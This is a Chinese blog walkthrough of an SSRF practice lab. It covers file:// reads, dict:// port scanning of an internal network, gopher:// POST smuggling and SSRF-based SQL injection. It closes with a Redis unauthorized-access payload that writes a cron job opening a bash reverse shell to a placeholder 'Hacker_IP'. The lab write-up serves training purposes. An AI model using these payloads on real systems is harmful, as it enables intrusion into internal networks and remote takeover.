SSRF综合靶场

最新推荐文章于 2024-04-10 21:19:21 发布
最新推荐文章于 2024-04-10 21:19:21 发布
阅读量1k 收藏 29
点赞数 18
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hot_milk1/article/details/136184123
版权

常见的SSRF的一些利用。

参考:

手把手带你用 SSRF 打穿内网 | 国光 (sqlsec.com)

跟着国光师傅学习SSRF | 沉铝汤的破站 (chenlvtang.top)Duoduo-chino/ssrf_vul: 国光师傅的SSRF靶场docker环境 (github.com)

# 打靶记录

  • 打开网站,可能存在SSRF漏洞:

  • 尝试对百度的robots.txt进行读取:

  • 利用file协议尝试读取文件:

  • 发现目标内网为172.72.23.21,利用dict协议进行内网端口探测,由于是打靶端口就设置80、443、8080、6379,不然要扫很多无用端口,实战可以扫多一点:

  • 结果:
172.72.23.26 8080
172.72.23.21 80
172.72.23.22 80
172.72.23.23 80
172.72.23.24 80
172.72.23.25 80
172.72.23.27 6379

# SSRF命令执行(GET)

  • 利用http协议访问172.72.23.22:

  • 使用Burp进行目录扫描:

  • 扫出shell.phpphpinfo.php

  • 查看flag(由于是服务器请求,需要编码一层,如果是burp则需要二次编码,因为burp在POST中会自动解码一次)

# SSRF SQL注入

同样使用http协议进行访问,加入id参数进行注入即可,注意编码:

# SSRF命令执行(POST)

  • 利用http协议访问172.72.23.22:80

  • 由于采用的是POST方式的表单,所以不能再用http协议来攻击,采用gopher协议,t它可以传递TCP数据流。

注意几点:

  1. Content-Length需要正确设置,用Burp发一次,会自动计算
  2. 需要URL编码一次
  3. 删除Accept-Encoding,否则结果会被两次编码
  4. 格式:gopher://172.72.23.24:80/_<编码后POST数据包>

# SSRF Redis未授权利用

  • 使用dict协议来简单判断是否存在未授权,执行info命令:dict://ip:port/info

  • 证实存在未授权,写入定时任务反弹shell,其基本payload:
flushall #删除所有key,保证我们的优先级最高
config set dir /var/spool/cron/ #设置目录,还有/etc/crontab或者/etc/cron.d/也是可以存放定时任务的地方
config set dbfilename root #文件名与用户名一致
set chenlvtnag "\n* * * * * /bin/bash -i >& /dev/tcp/Hacker_IP/2333 0>&1\n" #这里之所以有两个\n是为了保证写入的定时任务格式正确
save #保存

Pumpkin_Bridge
关注
  • 18
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF漏洞靶场
WINDY_PACE的博客
05-15 2690
对于SSRF,回显是能够成功利⽤的重要条件,所以过滤返回信息,验证远程服务器对请求的响应是⽐较容易的⽅法。如果WEB应⽤ 是去获取某⼀种类型的⽂件,那么在把返回结果展⽰给⽤户之前先验证返回的信息是否符合标准。 禁⽤不需要的协议,仅仅允许HTTP和HTTPS请求。可以防⽌类似于file://、gopher://、ftp://等引起的问题
ssrf+redis未授权靶场
actistsec的博客
10-25 1869
自己搭建不太合理的ssrf联动redis未授权
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
SSRF靶场
最新发布
2301_80217595的博客
04-10 939
回到题目,在题目代码中一共对域名进行了两次请求,第一次是 gethostbyname 方法,第二次则是 file_get_contents 文件读取,可以通过 ceye.io 来实现攻击,DNS Rebinding 中设置两个 IP,一个是 127.0.0.1 另一个是随便可以访问的 IP。如果链接可以访问任意请求,则存在ssrf漏洞。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0。
burp靶场--ssrf
qq_33168924的博客
01-17 1384
服务器端请求伪造是一种 Web 安全漏洞,允许攻击者导致服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授权凭据,或者代码执行。
vuln-range之ssrf靶场
lionwerson的博客
03-31 553
1.开启靶机 提示用url传入参数进去,直接读出文件,完事。 ?url=file:///etc/passwd #注意三个斜杠
burpsuite靶场——SSRF
qq_61768489的博客
12-26 1419
即使有一些HTTP流量会被拦截,也会因为不怎么拦截DNS流量而获取我们想要的结果。从名字就能看出来这个插件可以对每一个点都进行collaborator测试以发现可以使用带外技术发送请求的点,为了方便插件进行测试,我们将靶场地址添加到目标中。有的后端系统用户是无法直接访问的,但是服务器可以成功向其发送请求,所以如果利用ssrf同样可以向这些本不对用户开放的后端系统发出恶意请求。有的情况还可以利用SSRF盲打对目标后端系统进行探测,比如探测目标网络中开放的主机及端口之类的,这些同样也可以通过带外通道接收到。
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
八、漏洞原理利用(4)SSRF 笔记和靶场
weixin_45540609的博客
05-08 427
一、SSRF 服务端请求伪造 用户对A网站传参,访问B网页 用户可以控制A网站发起网络请求 eg:翻译网页 1、通过JS把整个页面需要翻译的东西给翻译网站,翻译后还给用户。 http://web.yeekit.com/ 两个得到的ip都是一样的 2、翻译网站直接帮你翻译,得到结果后给你。 得到的ip不同 3、作用 操作服务器发起网络请求 1、可以做攻击其他人的跳板 2、可以杀入内网 192.168.1.1 3、可以杀入本机 127.0.0.1 ...
SSRF与靶场(史上最详细)
qq_34598847的博客
10-17 847
SSRF漏洞介绍:SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。SSRF漏洞原理:SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。
CTFhub_SSRF靶场教程
weixin_58954236的博客
09-09 876
请求的URL中必须包含,来尝试利用URL的一些特殊地方绕过这个限制吧访问题目所给的链接,使用bp抓包此flag看长度可知是假的在浏览器中输入构造的payload得到flag:ctfhub{eecad35d4ef30dfb74eaabe4}提交flag。
SSRF漏洞-01】服务端请求伪造靶场实战
cc
02-20 3790
服务端请求伪造)是一种由攻击者构造请求,由服务器端发起请求的安全漏洞,本质上是属于信息泄露漏洞。如果“请求伪造”发生在服务器端,那么这个漏洞就叫做“服务器端请求伪造”即SSRF。SSRF是一种攻击者发起的伪造由服务器端发起请求的一种攻击,也是常见的web安全漏洞(缺陷或者风险)之一。互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片、文件资源(下载或读取)。例如:百度提供识图功能。用户可以从本地或者URL。
iwebsec靶场SSRF)
果粒程
03-06 395
iwebsec靶场SSRF)
SSRF-Vulnerable-Lab靶场训练
weixin_44023442的博客
01-28 2017
参考文章 SSRF-Vulnerable-Lab tag: #SSRF Ref: 1、file_get_content.php 提取并显示指定文件内容的应用程序代码 在编程语言中,有一些函数可以获取本地保存文件的内容。这些功能可能能够从远程URL以及本地文件(例如PHP中的file_get_contents)中获取内容。 如果没有对输入内容进行处理,或者处理的不够严格,将有可能导致SSRF漏洞攻击。 输入:file_get_content.php 显示: 直接暴露源码 输入:file:///C:/W
ctfhub靶场练习——SSRF攻击
p36273的博客
07-01 536
靶场地址在:https://www.ctfhub.com/#/user/login使用工具:Burp Suite Professional抓包工具。
web安全ssrf复习
Vector_seven的博客
09-12 120
大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据;通常是将该服务器作为跳板对内网进行端口扫描等。
记一次SSRF靶场到内网打穿
君逍遥o
09-08 553
记一次SSRF靶场到内网打穿
pikachu靶场ssrf
08-07
对于Pikachu靶场SSRF,我了解到Pikachu是一个开源的靶场平台,用于测试和学习网络安全方面的知识和技能。SSRF(Server Side Request Forgery)是一种攻击技术,攻击者可以利用漏洞发送伪造的请求,从而访问应用程序内部的其他资源。可以使用Pikachu靶场来模拟和学习SSRF攻击和防御的技术。请注意,SSRF是一种违法行为,任何未经授权的尝试都是不合法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值